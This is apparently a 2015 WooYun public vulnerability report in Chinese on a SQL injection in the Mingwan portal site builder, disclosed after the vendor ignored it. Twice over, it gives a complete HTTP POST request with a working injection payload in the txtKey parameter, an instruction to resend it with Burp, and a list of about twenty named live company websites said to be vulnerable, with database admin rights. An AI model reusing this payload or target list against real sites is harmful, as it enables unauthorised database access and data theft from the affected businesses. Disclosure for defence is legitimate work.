当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116961

漏洞标题:铭万行业门户建站系统存在通用注入漏洞 涉及数十万企业用户

相关厂商:铭万信息技术有限公司

漏洞作者: 路人甲

提交时间:2015-05-29 15:40

修复时间:2015-07-13 15:42

公开时间:2015-07-13 15:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看了这个洞http://wooyun.org/bugs/wooyun-2015-0104558 给了18r上了主页 感觉不错
就拿他的案例测试

详细说明:

官网http://jianzhan.b2b.cn
权限也是很大 sa db权限

POST /messageboard/default.aspx HTTP/1.1
Content-Length: 262
Content-Type: application/x-www-form-urlencoded 
X-Requested-With: XMLHttpRequest 
Referer: http://www.norsencn.com:80/ 
Cookie: ASP.NET_SessionId=jjepzkjcudzxkgyu4zypm055 
Host: www.norsencn.com
Connection: Keep-alive Accept-Encoding: gzip,deflate 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.3
Accept: */* DefaultModule1%24rbIsReply=1&DefaultModule1%24txtKey=' And 1=(select db_name())%20and+'%'='&hidIsreply=DefaultModule1%24rbIsReply


DefaultModule1%24txtKey参数未过滤 可注入
因为是post数据。所以直接用burp测试。
看图片把。。
网站:www.jindadou.cn
看数据库名

1.png


看版本

QQ图片20150529150200.png


www.cqjgfq.cn

2.png


www.tianruiaircooler.com

3.png


www.norsencn.com

4.png


附部分案例。用上面的数据包。直接放burp里面发包即可得到数据库名称。
http://www.norsencn.com
http://www.kowafoods.com.cn/
http://www.szyt.com.cn
http://www.jiahua-food.com
http://www.jindadou.cn
http://www.tianruiaircooler.com
http://www.cqjgfq.cn
http://fz.yanshi.b2b.cn
http://www.zwcy.com
http://www.norsencn.com
http://www.sanxin-med.com
http://www.qingheasia.com
http://www.schkpackage.com
http://www.jxjgej.com
http://www.3zhong.cn
http://www.coupling.com.cn
http://www.autoshenyang.com
http://www.cqfuyuan.com
http://www.cqkehong.com
http://www.dletyy.com
http://www.jinkuaizi.com


数据库名和数据库版本都出来了,还不够证明么?昨天就这样提交的不给通过。难道非得一个一个把字段跑出来库脱下来才叫证明?

漏洞证明:

官网http://jianzhan.b2b.cn
权限也是很大 sa db权限

POST /messageboard/default.aspx HTTP/1.1
Content-Length: 262
Content-Type: application/x-www-form-urlencoded 
X-Requested-With: XMLHttpRequest 
Referer: http://www.norsencn.com:80/ 
Cookie: ASP.NET_SessionId=jjepzkjcudzxkgyu4zypm055 
Host: www.norsencn.com
Connection: Keep-alive Accept-Encoding: gzip,deflate 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.3
Accept: */* DefaultModule1%24rbIsReply=1&DefaultModule1%24txtKey=' And 1=(select db_name())%20and+'%'='&hidIsreply=DefaultModule1%24rbIsReply


DefaultModule1%24txtKey参数未过滤 可注入
因为是post数据。所以直接用burp测试。
看图片把。。
网站:www.jindadou.cn
看数据库名

1.png


看版本

QQ图片20150529150200.png


www.cqjgfq.cn

2.png


www.tianruiaircooler.com

3.png


www.norsencn.com

4.png


附部分案例。用上面的数据包。直接放burp里面发包即可得到数据库名称。
http://www.norsencn.com
http://www.kowafoods.com.cn/
http://www.szyt.com.cn
http://www.jiahua-food.com
http://www.jindadou.cn
http://www.tianruiaircooler.com
http://www.cqjgfq.cn
http://fz.yanshi.b2b.cn
http://www.zwcy.com
http://www.norsencn.com
http://www.sanxin-med.com
http://www.qingheasia.com
http://www.schkpackage.com
http://www.jxjgej.com
http://www.3zhong.cn
http://www.coupling.com.cn
http://www.autoshenyang.com
http://www.cqfuyuan.com
http://www.cqkehong.com
http://www.dletyy.com
http://www.jinkuaizi.com


数据库名和数据库版本都出来了,还不够证明么?昨天就这样提交的不给通过。难道非得一个一个把字段跑出来库脱下来才叫证明?

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)